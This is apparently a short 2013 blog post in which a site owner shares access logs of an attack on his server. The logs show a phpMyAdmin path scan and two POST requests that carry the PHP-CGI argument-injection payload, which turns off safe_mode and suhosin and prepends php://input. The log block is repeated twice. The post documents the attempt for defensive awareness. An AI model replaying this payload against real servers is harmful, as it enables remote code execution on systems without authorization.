Attack from 91.224.160.25
1 July, 2013 - 14:57
I almost feel bad about putting this guy in the lamers section.
Looks like it was some kind of attack to try to disable suhosin and safe mode. With the small footprint he had, I really do feel bad.
91.224.160.25 - - [27/Jun/2013:17:59:15 -0400] "GET /tutorials/Laptop-Overclocking-Unleashing-Beast HTTP/1.1" 200 6829 "-" "Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:15 -0400] "GET /phpmyadmin/index.php HTTP/1.1" 404 376 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:15 -0400] "GET /phpMyAdmin/index.php HTTP/1.1" 404 3417 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:17 -0400] "GET /myadmin/index.php HTTP/1.1" 404 3412 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:19 -0400] "GET /pma/index.php HTTP/1.1" 404 3410 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:21 -0400] "GET /mysqladmin/index.php HTTP/1.1" 404 3416 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:23 -0400] "GET /dbadmin/index.php HTTP/1.1" 404 3413 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:25 -0400] "GET /mysql/index.php HTTP/1.1" 404 3414 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:27 -0400] "GET /mysql-admin/index.php HTTP/1.1" 404 3417 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:29 -0400] "GET /PMA/index.php HTTP/1.1" 404 3412 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:31 -0400] "GET /php-my-admin/index.php HTTP/1.1" 404 3415 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:33 -0400] "GET /php-myadmin/index.php HTTP/1.1" 404 3416 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:35 -0400] "GET /webdb/index.php HTTP/1.1" 404 3413 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:37 -0400] "GET /webadmin/index.php HTTP/1.1" 404 3414 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:39 -0400] "POST /?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2f%2finput+-n HTTP/1.1" 403 7412 "-" "Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
91.224.160.25 - - [27/Jun/2013:17:59:42 -0400] "POST /phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2f%2finput+-n HTTP/1.1" 403 10265 "-" "Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01"
91.224.160.25 - - [27/Jun/2013:17:59:15 -0400] "GET /phpmyadmin/index.php HTTP/1.1" 404 376 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:15 -0400] "GET /phpMyAdmin/index.php HTTP/1.1" 404 3417 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:17 -0400] "GET /myadmin/index.php HTTP/1.1" 404 3412 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:19 -0400] "GET /pma/index.php HTTP/1.1" 404 3410 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:21 -0400] "GET /mysqladmin/index.php HTTP/1.1" 404 3416 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:23 -0400] "GET /dbadmin/index.php HTTP/1.1" 404 3413 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:25 -0400] "GET /mysql/index.php HTTP/1.1" 404 3414 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:27 -0400] "GET /mysql-admin/index.php HTTP/1.1" 404 3417 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:29 -0400] "GET /PMA/index.php HTTP/1.1" 404 3412 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:31 -0400] "GET /php-my-admin/index.php HTTP/1.1" 404 3415 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:33 -0400] "GET /php-myadmin/index.php HTTP/1.1" 404 3416 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:35 -0400] "GET /webdb/index.php HTTP/1.1" 404 3413 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:37 -0400] "GET /webadmin/index.php HTTP/1.1" 404 3414 "-" "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0"
91.224.160.25 - - [27/Jun/2013:17:59:39 -0400] "POST /?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2f%2finput+-n HTTP/1.1" 403 7412 "-" "Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
91.224.160.25 - - [27/Jun/2013:17:59:42 -0400] "POST /phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2f%2finput+-n HTTP/1.1" 403 10265 "-" "Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01"